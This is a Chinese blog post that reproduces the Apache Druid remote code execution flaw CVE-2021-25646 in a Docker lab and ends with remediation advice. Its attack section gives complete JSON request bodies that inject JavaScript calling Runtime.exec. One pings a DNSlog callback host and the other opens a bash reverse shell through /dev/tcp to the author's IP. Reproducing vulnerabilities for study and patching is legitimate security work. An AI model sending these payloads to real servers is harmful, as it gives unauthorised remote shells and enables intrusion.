Apache druid未授权命令执行漏洞复现(CVE-2021-25646)

最新推荐文章于 2024-03-08 10:47:35 发布
最新推荐文章于 2024-03-08 10:47:35 发布
阅读量3.4k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/deng_menglihua/article/details/115859094
版权

Apache druid未授权命令执行漏洞复现(CVE-2021-25646)

1.简介

Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

2.漏洞概述

  • 编号:CVE-2021-25646(严重)
    Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。

3.影响版本

  • Apache Druid < 0.20.1

4.环境搭建

ubuntu
1.安装docker

apt install docker.io

2.搭建漏洞环境

docker run -d -p 8081:8888 fokkodriesprong/docker-druid

在这里插入图片描述
在这里插入图片描述

5.漏洞复现

  • 我的ip为:121.36.200.207
  • 访问:http://121.36.200.207:8081
    点击Load data
    在这里插入图片描述

点击Local disk
在这里插入图片描述

右侧
Base directory填入:quickstart/tutorial/
File filter填入:wikiticker-2015-09-12-sampled.json.gz
点击preview,burp抓包
在这里插入图片描述
在这里插入图片描述

DNSlog

首先获取dnslog地址,
在这里插入图片描述

把请求正文改成以下正文,把yt1biq.dnslog.cn地址替换成自己获取的地址:

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping yt1biq.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

在这里插入图片描述
在这里插入图片描述

反弹shell

把请求正文改成以下正文,注意要改成自己的监听ip和端口:

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/121.36.200.207/1234 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

在这里插入图片描述

成功反弹shell
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NcD7XNNR-1618799413952)(./img/10.png)]

6.修复方式

  • 升级Apache Druid 到最新的版本
  • 对Apache Druid进行权限控制,只允许受信任的主机访问集群服务器
    建议及时更新Apache Druid,下载链接为:
  • https://druid.apache.org/downloads.html
  • https://github.com/apache/druid/releases/tag/druid-0.20.1

欢迎大家评论交流

Bin_少年
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web渗透测试漏洞Druid 授权访问
HACKONE的博客
03-20 317
Druid是一个高效的数据查询系统,主要解决的是对于大量的基于时序的数据进行聚合查询。通常是基于时序的事实事件,事实发生后进入Druid,外部系统就可以对该事实进行查询。为了彻底避免授权访问风险,如果不需要使用或者很少使用Druid的监控功能,可以尝试彻底禁用Druid监控页,这种做法比较简单粗暴,有利有弊。Druid是一个分布式数据分析平台,也是一个时序数据库,也是一个集群系统,使用zookeeper做节点管理和事件监控。(2)可能影响使用习惯,可能影响工作的开展,降低Druid管理的便利性。
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
Apache Druid 代码执行漏洞CVE-2021-25646)
最新发布
qq_69775412的博客
03-08 632
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 数据安全 web安全 威胁情报 安全防护 安全测试
Silentsoul04#vulnerability-paper-1#CVE-2021-25646:Apache Druid R
07-25
声明:请勿用作违法用途,否则后果自负0x01 简介Druid 不仅是一个数据库连接池,还包含一个 ProxyDriver、一系列内置的 JDBC 组件库、一个
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 1935
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
CVE-2021-25646:Apache Druid RCE远程代码执行
m0_58596609的博客
12-29 1451
CVE-2021-25646:Apache Druid RCE远程代码执行
Java安全漏洞Druid授权访问解决
热门推荐
qq_46119575的博客
01-04 2万+
Java安全漏洞Druid授权访问解决
Druid授权访问 漏洞
Boom!脑洞大爆炸的博客
11-11 5943
Druid授权访问 漏洞
Druid授权漏洞进一步的利用
qq_50854662的博客
05-15 5625
Druid授权漏洞实战利用思路
Apache Druid:高性能实时分析数据库-开源
06-22
Druid 专为快速临时分析、即时数据可见性或支持高并发性很重要的工作流而设计。 因此,Druid 通常用于为需要交互式、一致用户体验的 UI 提供动力。 Druid 从 Kafka 和 Amazon Kinesis 等消息总线流式传输数据,并从 HDFS 和 Amazon S3 等数据湖批量加载文件。 Druid 支持最流行的结构化和半结构化数据文件格式。 Druid 已经过基准测试,其性能大大优于传统解决方案。 Druid 结合了新颖的存储思想、索引结构以及精确和近似查询,可在一秒内返回大多数结果。 Druid 为点击流、APM、供应链、网络遥测、数字营销、风险/欺诈和许多其他类型的数据解锁了新型查询和工作流程。 Druid 专为对实时和历史数据进行快速、即席查询而构建。
CVE-2021-25646 Apache Druid JavaScript远程代码执行漏洞
afei001
03-31 382
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞 5.1 Docker搭建漏洞环境 5.2 构造Payload反弹shell 5.3 POC验证CVE-2021-25646 6.漏洞 1.漏洞概述 Druid 是一个高性能实时分析数据库。它是为大型数据集上实时探索查询的引擎,提供专为OLAP设计的开源分析数据存储系统,它的设计意图是在面对代码部署、机器故障以及其他产品系统遇到不测时能保持100%正常运行。它也可以用于后台用例,但设计决策...
Apache Druid 远程代码执行漏洞CVE-2021-25646)
bqnagus
09-29 550
描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码
CVE-2021-25646-Apache Druid RCE
weixin_59474029的博客
08-23 120
经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。
Apache Druid 命令执行漏洞(CVE-2021-25646)及排查
dayouzi的博客
08-15 264
Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
Druid授权高危漏洞方法
weixin_68647219的博客
07-28 4958
证明漏洞存在,泄露了网站后台功能模块的url地址,大多数都是一些api接口,有时候也会泄露一些敏感文件。这里泄露的主要是登录用户的session,不管是登陆成功的,没登陆成功的,还是失效的都会储存在这里。是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成授权访问。4.利用session,替换cookie,绕过登录验证,成功登录。
Druid授权访问漏洞
06-06
Druid授权访问漏洞是指攻击者可以通过授权访问的方式,获取到Druid系统中的敏感信息。Druid是一款开源分布式的实时数据处理系统,广泛应用于大数据领域。由于Druid默认安装时对其管理界面进行访问控制,因此攻击者可以通过访问Druid默认管理界面(如/druid/index.html)的方式获取到系统中的敏感信息,例如:数据源、查询历史、访问日志等。 攻击者可以通过Druid授权访问漏洞窃取敏感信息,进而发起更高级的攻击,例如:SQL注入、远程命令执行等。 修Druid授权访问漏洞,可以采取以下措施: - 修改Druid默认配置,对管理界面进行访问控制,例如通过添加用户名密码认证、IP白名单等方式; - 及时升级Druid到最新版本,新版本已经修授权访问漏洞-Druid进行定期安全检查,及时发并修漏洞。 此外,为了增强系统的安全性,建议不要将Druid管理界面直接暴露在公网上,最好通过VPN等安全通道进行访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值